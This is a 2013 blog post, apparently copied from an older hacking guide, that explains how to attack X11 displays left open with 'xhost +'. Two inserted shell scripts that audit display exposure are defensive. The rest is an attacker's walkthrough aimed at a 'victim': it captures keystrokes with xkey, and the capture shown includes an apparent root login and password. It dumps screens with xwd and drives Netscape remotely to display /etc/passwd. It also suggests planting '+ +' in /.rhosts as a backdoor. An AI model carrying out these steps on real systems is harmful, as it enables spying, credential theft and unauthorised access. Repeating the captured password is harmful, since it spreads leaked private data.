Friday, 4 January 2013

X11 (6000 TCP)

X11 displays are (normally) protected at the network level - that is, there
are no usernames and passwords involved. The display is actually a server
and it listens on port 6000 (TCP). Control over which clients may connect to
the server is handled with the "xhost" command. By default it is set up so
that nobody can connect to the display - default deny. As soon as programs
are sharing the display (exporting an xterm to your display from another
host or whatever) the user of the display has to add the IP number or DNS
name of the client that wishes to connect by running the command "xhost
+<client>". In theory this works perfectly well, but in the real world
people tend to just enter "xhost +", which allows anyone to connect to the
display.
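The following is an added example, not part of the original post, written from the display owner's side: it classifies the access-control state reported by "xhost" (so a display left open with "xhost +" stands out in an audit) and lists any sockets in the X11 port range that the host is listening on. It assumes the modern xhost message text and the column layout of "ss -ltn"; the sample outputs embedded below are constructed for the demonstration.

```shell
# Added example (not from the original post). Audit helpers for the X11
# exposure described above: one classifies "xhost" output, the other picks
# X11 listeners (TCP 6000-6063, i.e. displays :0 to :63) out of "ss -ltn".

# Reads "xhost" output on stdin and prints one of:
#   open-to-all  - access control disabled ("xhost +" was run)
#   host-list    - access control on, but network hosts (INET/INET6) allowed
#   local-only   - access control on, no network hosts listed
x11_access_state() {
    awk '
        /access control disabled/ { state = "open-to-all" }
        /access control enabled/  { state = "local-only" }
        # xhost lists allowed entries one per line, e.g. "INET:host" or
        # "SI:localuser:alice"; only INET/INET6 entries are network hosts.
        /^INET6?:/ && state == "local-only" { state = "host-list" }
        END {
            if (state == "") print "unknown"; else print state
        }
    '
}

# Reads "ss -ltn" output on stdin and prints the local address:port of every
# listener in the X11 display range (6000-6063).
tcp_x11_listeners() {
    awk '$1 == "LISTEN" && $4 ~ /:(60[0-5][0-9]|606[0-3])$/ { print $4 }'
}

# Constructed sample inputs (assumption: they follow the real tools' format).
SAMPLE_OPEN='access control disabled, clients can connect from any host'
SAMPLE_LIST='access control enabled, only authorized clients can connect
INET:buildhost.example.com
SI:localuser:alice'
SAMPLE_LOCAL='access control enabled, only authorized clients can connect
SI:localuser:alice'
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:6000        0.0.0.0:*
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*'

# Stand-alone demonstration on the constructed samples.
printf 'xhost + host:      %s\n' "$(printf '%s\n' "$SAMPLE_OPEN"  | x11_access_state)"
printf 'host list:         %s\n' "$(printf '%s\n' "$SAMPLE_LIST"  | x11_access_state)"
printf 'local only:        %s\n' "$(printf '%s\n' "$SAMPLE_LOCAL" | x11_access_state)"
printf 'X11 TCP listeners: %s\n' "$(printf '%s\n' "$SAMPLE_SS"    | tcp_x11_listeners)"
```

On a real host the same functions are fed from the live tools: `xhost | x11_access_state` and `ss -ltn | tcp_x11_listeners`. A result of "open-to-all" is fixed with `xhost -` (re-enable access control) and a stray network host with `xhost -<client>`. Note that current X.Org servers start with `-nolisten tcp` by default, so the second check usually prints nothing unless someone has deliberately enabled TCP listening; the xhost state still matters for clients arriving over SSH forwarding or a Unix socket.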
A host whose display is open for anyone to connect to is risking a lot, and
could possibly be compromised. There are a few nice things to do when you
find an open X11 display. One of the most common attacks is to capture all
the keystrokes that are entered on the victim's host. The program "xkey"
(available from www.hack.co.za) does this very neatly:
> xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<<Shift_R>>P 196.37.xxx.1
weirdshitometer
It's clear why we are excited about key captures. An open X11 display can
also be "copied" - the root window (the main window) can be copied and
displayed. Each window has a unique ID - you can specify which window you
want to copy, but for a start let us get the root window:
> xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
> xv /tmp/screendump
We are using xv to display the screen - xv can read the xwd format straight
off. The screen might include some interesting data - if you get a
screensaver - bad luck - use finger to see when someone is active. To get a
list of windows that are open on the display you might want to issue the
command:
> xwininfo -display <victim> -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227
+536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
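As an added example (not from the original post), the listing above can be reduced to a short inventory of what a display actually exposes: window id, title and size, with the 1x1 placeholder windows that X toolkits create dropped. It is written for the owner of a display checking what a screen capture or window list would reveal, and assumes only the "xwininfo -all -root | grep '"'" line format shown above; the sample input is built from the post's own listing.

```shell
# Added example (not from the original post). Turns the "xwininfo -all -root"
# lines shown above into tab-separated "id<TAB>title<TAB>WxH" records and
# skips 1x1 placeholder windows, which carry no visible content.
parse_xwininfo() {
    awk '
        # each line: <id> "<title>": ("<res-name>" "<class>") WxH+X+Y +X+Y
        /^[ \t]*0x[0-9a-fA-F]+[ \t]+"/ {
            id = $1
            # the title is the first quoted string, terminated by the ":"
            # that precedes the (res-name class) pair
            if (match($0, /"[^"]*":/) == 0) next
            title = substr($0, RSTART + 1, RLENGTH - 3)
            geom = ""
            for (i = 2; i <= NF; i++)
                if ($i ~ /^[0-9]+x[0-9]+[+-][0-9]+[+-][0-9]+$/) { geom = $i; break }
            if (geom == "") next
            split(geom, wh, /[x+-]/)          # wh[1] = width, wh[2] = height
            if (wh[1] + 0 <= 1 && wh[2] + 0 <= 1) next   # 1x1 placeholder
            printf "%s\t%s\t%sx%s\n", id, title, wh[1], wh[2]
        }
    '
}

# Sample input: the listing from the post, wrapped lines joined (constructed).
SAMPLE_XWININFO='0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0'

# Stand-alone demonstration: 8 lines in, 6 real windows out.
printf '%s\n' "$SAMPLE_XWININFO" | parse_xwininfo
```

Against a live display the same filter is `xwininfo -display :0 -all -root | grep '"' | parse_xwininfo`; titles such as "Communicator Bookmarks for <user>" or a mail client's subject line are exactly the kind of detail that leaks to anyone the display lets in.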
If the victim is using more than one virtual screen you will be able to see
the other screen listed (you won't see it with xwd). With a bit of luck you
get a Netscape browser open. Finding Netscape open on an open X11 display is
very good news as you can remotely control Netscape. Fancy telling Netscape
to open /etc/passwd and doing another screen capture? Here is how:
> netscape -display <victim> -remote 'openFile(/etc/passwd)'
> xwd -display <victim> -root -silent -out /tmp/netscape
> xv /tmp/netscape
You can even tell Netscape to write files. It won't work when trying to
overwrite files - you will get a nasty Netscape popup - but you can write
files that do not exist. You could create a page with "+ +" on it, redirect
the browser to the page, and, if Netscape is running as root, save it to
/.rhosts. Be sure to have a close look at
http://home.netscape.com/newsref/std/x-remote.html if you find an open X11
running Netscape.
In theory you could also send keystrokes to an open X display. I found the
program "xpusher.c" at http://www.hack.co.za, fiddled around with it, but it
does not seem to work. There might be other programs around. Keep looking...